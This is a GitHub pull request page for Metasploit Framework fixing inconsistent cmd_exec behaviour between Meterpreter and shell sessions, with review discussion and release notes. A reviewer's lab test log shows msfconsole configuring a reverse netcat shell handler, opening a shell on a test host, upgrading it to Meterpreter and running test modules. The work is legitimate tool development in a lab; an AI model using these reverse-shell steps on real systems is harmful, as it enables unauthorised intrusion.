Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

address cmd_exec inconsistencies with mettle/meterpreter payloads #9438

Merged
merged 2 commits into from
Jan 22, 2018
Merged

address cmd_exec inconsistencies with mettle/meterpreter payloads #9438

merged 2 commits into from
Jan 22, 2018

Conversation

busterb
Copy link
Member

@busterb busterb commented Jan 21, 2018
edited
Loading

Fixes #9429

This attempts to address the inconsistent behavior. Test cases are in the original issue.

@bcoles would you mind giving this a quick pass? Thanks!

This took a little while to push up, had some interesting CI corner cases that had to be fixed first. This should also fix the crash observed when running the new 'rename process' functionality from an injected process.

@bcoles
Copy link
Contributor

bcoles commented Jan 21, 2018

Changes appears to work as described.

  • ✔️ Segfault: fixed
  • ✔️ Timeout: fixed
  • ✔️ cmd_exec cmd style invocation: fixed

I'll assume your CachedSize changes are sane (I love inexplicable unsigned integers as much as the next person, but perhaps there should be a constant for each payload platform defined somewhere ?).

Output, with Fedora 20 x64 test client:

msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > set lport 1337
lport => 1337
msf5 exploit(multi/handler) > set lhost 172.16.191.244
lhost => 172.16.191.244
msf5 exploit(multi/handler) > set payload cmd/unix/reverse_netcat
payload => cmd/unix/reverse_netcat
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 172.16.191.244:1337 
[*] Command shell session 1 opened (172.16.191.244:1337 -> 172.16.191.137:37488) at 2018-01-21 17:20:39 -0500


id
uid=1000(user) gid=1000(user) groups=1000(user),10(wheel) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
^Z
Background session 1? [y/N]  y

msf5 exploit(multi/handler) > use exploit/linux/local/test
msf5 exploit(linux/local/test) > info

       Name: Test
     Module: exploit/linux/local/test
   Platform: Linux
       Arch: x86, x64
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent

Provided by:
  test

Available targets:
  Id  Name
  --  ----
  0   Auto

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SESSION                   yes       The session to run this module on.
  TIMEOUT  60               yes       Timeout (seconds)

Payload information:

Description:
  Test

msf5 exploit(linux/local/test) > run

[-] Exploit failed: The following options failed to validate: SESSION.
[*] Exploit completed, but no session was created.
msf5 exploit(linux/local/test) > set session 1
session => 1
msf5 exploit(linux/local/test) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.16.191.244:4444 
[*] Running command: "/bin/ls -l /etc/passwd"
command completed successfully
we made it to the end


[*] Exploit completed, but no session was created.

msf5 exploit(linux/local/test) > 

msf5 exploit(linux/local/test) > 
msf5 exploit(linux/local/test) > 
msf5 exploit(linux/local/test) > 
msf5 exploit(linux/local/test) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 172.16.191.244:4433 
[*] Sending stage (857352 bytes) to 172.16.191.137
[*] Meterpreter session 2 opened (172.16.191.244:4433 -> 172.16.191.137:49883) at 2018-01-21 17:21:09 -0500
[*] Command stager progress: 100.00% (773/773 bytes)
msf5 exploit(linux/local/test) > sessions -k
[-] Please specify valid session identifier(s)
msf5 exploit(linux/local/test) > sessions -l

Active sessions
===============

  Id  Name  Type                   Information                                                       Connection
  --  ----  ----                   -----------                                                       ----------
  1         shell cmd/unix                                                                           172.16.191.244:1337 -> 172.16.191.137:37488 (172.16.191.137)
  2         meterpreter x86/linux  uid=1000, gid=1000, euid=1000, egid=1000 @ localhost.localdomain  172.16.191.244:4433 -> 172.16.191.137:49883 (172.16.191.137)

msf5 exploit(linux/local/test) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: uid=1000, gid=1000, euid=1000, egid=1000
meterpreter > 
meterpreter > 
meterpreter > 
Background session 2? [y/N]  
msf5 exploit(linux/local/test) > 
msf5 exploit(linux/local/test) > 
msf5 exploit(linux/local/test) > 
msf5 exploit(linux/local/test) > set session 2
session => 2
msf5 exploit(linux/local/test) > run

[*] Started reverse TCP handler on 172.16.191.244:4444 
[*] Running command: "/bin/ls -l /etc/passwd"
command completed successfully
we made it to the end
[*] Exploit completed, but no session was created.
msf5 exploit(linux/local/test) > 
msf5 exploit(linux/local/test) > 
msf5 exploit(linux/local/test) > 
msf5 exploit(linux/local/test) > 
msf5 exploit(linux/local/test) > 
msf5 exploit(linux/local/test) > 
msf5 exploit(linux/local/test) > 
msf5 exploit(linux/local/test) > 
msf5 exploit(linux/local/test) > use exploit/linux/local/test2
msf5 exploit(linux/local/test2) > set session 1
session => 1
rmsf5 exploit(linux/local/test2) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.16.191.244:4444 
[*] Running command: "/bin/echo" with args "some_initial_data && sleep 20 && echo true"
command completed successfully
we made it to the end
[*] Exploit completed, but no session was created.
msf5 exploit(linux/local/test2) > set session 2
session => 2
msf5 exploit(linux/local/test2) > run

[*] Started reverse TCP handler on 172.16.191.244:4444 
[*] Running command: "/bin/echo" with args "some_initial_data && sleep 20 && echo true"
command completed successfully
we made it to the end
[*] Exploit completed, but no session was created.

@bcoles bcoles mentioned this pull request Jan 21, 2018
Merged
6 tasks
@busterb
Copy link
Member Author

busterb commented Jan 22, 2018

Thanks for testing @bcoles , now on to the PHP payload :P

The CachedSize integers are generated by a script, and for legacy reasons, our spec tests are sticklers about those. I put those changes in a separate commit to make review easier. Let me noodle on a better way we might be able to solve the problem CachedSize solves, because I do feel like we're wasting time valuable time as humans every time we update them.

sempervictus
sempervictus approved these changes Jan 22, 2018
View reviewed changes
Copy link
Contributor

@sempervictus sempervictus left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Sometimes a rational fix devolves into a game of whackamole to find all the workarounds previously implemented... Thanks.

lib/msf/core/post/common.rb
if d == ""
if (Time.now.to_i - start < time_out) && (o == '')
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Seriously? Thank you...

@busterb busterb merged commit 69818ae into rapid7:master Jan 22, 2018
busterb added a commit that referenced this pull request Jan 22, 2018
@busterb
Land #9438, address cmd_exec inconsistencies
f95d7b2
@busterb
Copy link
Member Author

busterb commented Jan 22, 2018
edited by allrosenthal-r7
Loading

Release Notes

This fix resolves issues with the cmd_exec command behaving inconsistently with Meterpreter versus shell payloads. It also resolves some reverse_http issues when reconnecting via Linux/OSX native Meterpreter.

jmartin-tech pushed a commit to jmartin-tech/metasploit-framework that referenced this pull request Jan 24, 2018
@busterb @jmartin-tech
Land rapid7#9438, address cmd_exec inconsistencies
22533f0
jmartin-tech pushed a commit to jmartin-tech/metasploit-framework that referenced this pull request Jan 24, 2018
@busterb @jmartin-tech
Land rapid7#9438, address cmd_exec inconsistencies
55c3454
@allrosenthal-r7 allrosenthal-r7 added the rn-fix release notes fix label Feb 7, 2018
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@sempervictus sempervictus sempervictus approved these changes

Assignees
No one assigned
Labels
bug payload rn-fix release notes fix
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

cmd_exec inconsistent behaviour between Meterpreter and Shell sessions
4 participants
@busterb @bcoles @sempervictus @allrosenthal-r7